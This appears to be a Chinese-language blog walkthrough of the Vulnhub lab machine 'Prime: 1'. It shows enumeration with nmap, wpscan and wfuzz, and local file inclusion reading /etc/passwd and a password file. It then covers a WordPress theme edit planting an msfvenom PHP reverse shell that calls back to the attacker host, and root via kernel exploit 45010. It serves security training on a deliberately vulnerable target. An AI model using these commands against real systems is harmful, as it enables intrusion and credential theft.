Vulnhub-靶机-PRIME: 1

今天发现了一个有趣的靶机,加载到本地VMware Workstation工作站进行漏洞复现

靶机下载地址  https://www.vulnhub.com/entry/prime-1,358/

对目标进行扫描发现开放端口信息

nmap -sS -sV -p- -T5 100.100.100.130

在这里插入图片描述

浏览器访问,并对其进行目录扫描

在这里插入图片描述
在这里插入图片描述

dirb 描目录发现了/wordpress目录和一些其他的页面

在这里插入图片描述

在这里插入图片描述

对wordpress进行扫描

wpscan--url http://100.100.100.130/wordpress/ --enumerate vt,vp,u

在这里插入图片描述
发现了一个用户名称
在这里插入图片描述

发现提示文件 /dev 和 secret.txt
在这里插入图片描述

在这里插入图片描述

提示让使用fuzz模糊测试在某个页面中找到某参数

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://100.100.100.130/index.php?FUZZ=shit

在这里插入图片描述

根据上面的提示有个文件location.txt 访问:http://100.100.100.130/index.php?file=location.txt

在这里插入图片描述
成功得到location.txt内容,里面提示在其他php页面用secrettier360参数,根据上面dirb得到的image.php进行测试

curl http://100.100.100.130/image.php?secrettier360=index.php

读取index.php,发现文件包含漏洞

在这里插入图片描述

读取/etc/passwd

在这里插入图片描述

curl http://100.100.100.130/image.php?secrettier360=/etc/passwd

在这里插入图片描述

得知有个密码文件password.txt 在目录/home/saket下面,直接读文件

http://100.100.100.130/image.php?secrettier360=/home/saket/password.txt

在这里插入图片描述

在这里插入图片描述

得到密码:follow_the_ippsec

尝试WordPress用户victor的密码,判断目标WordPress存在用户victor两个方式,一个是目标靶机的web上有对应用户发表的文章,另一个就是通过wpscan进行扫描探测出来的

在这里插入图片描述

访问WordPress的默认后台路径

http://100.100.100.130/wordpress/wp-admin

尝试使用 发现的账号密码登录

victor : follow_the_ippsec
在这里插入图片描述

在这里插入图片描述

发现了文件secret.php可以修改并更新的

在这里插入图片描述

使用metasploit进行利用,通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell

msfvenom -p php/meterpreter/reverse_tcp lhost=100.100.100.128 lport=7788 -f raw -o shell.php

在这里插入图片描述

生成的代码直接更新到secret.php文件中
在这里插入图片描述

配置好metasploit,访问 http://100.100.100.130/wordpress/wp-content/themes/twentynineteen/secret.php成功反弹shell
在这里插入图片描述

python -c "import pty;pty.spawn('/bin/bash');" 获取个完整交互的shell

在这里插入图片描述

切换到tmp目录,查看内核版本信息

在这里插入图片描述

uname -a

在这里插入图片描述

搜索searchsploit 16.04 Ubuntu

在这里插入图片描述

用LinuxKernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local PrivilegeEscalation进行提权

把45010.c拷到当前目录

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

编译一下gcc 45010.c -o root

在这里插入图片描述

上传的文件夹需要有写权限 选择 /tmp 文件夹
在这里插入图片描述

进入shell交互界面
给上执行权限

chmod +x root

然后./root执行 成功拿到root权限

在这里插入图片描述

拿到flag

在这里插入图片描述

总结

总的来说这个靶机还是比较常规的,如目录扫描字典应该再进行扩充,如很多文件扫描不到。用dirb做信息收集,用kali中自带的wfuzz模糊性测试,遇到WordPress网站可以使用wpscan扫一下,在这个靶机中能拿到用户名。web考察不是很多,只用到一个本地文件包含。进到wordpress后台,修改模板写一个shell,都是常规思路,内核漏洞提权也是常规提权手段。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值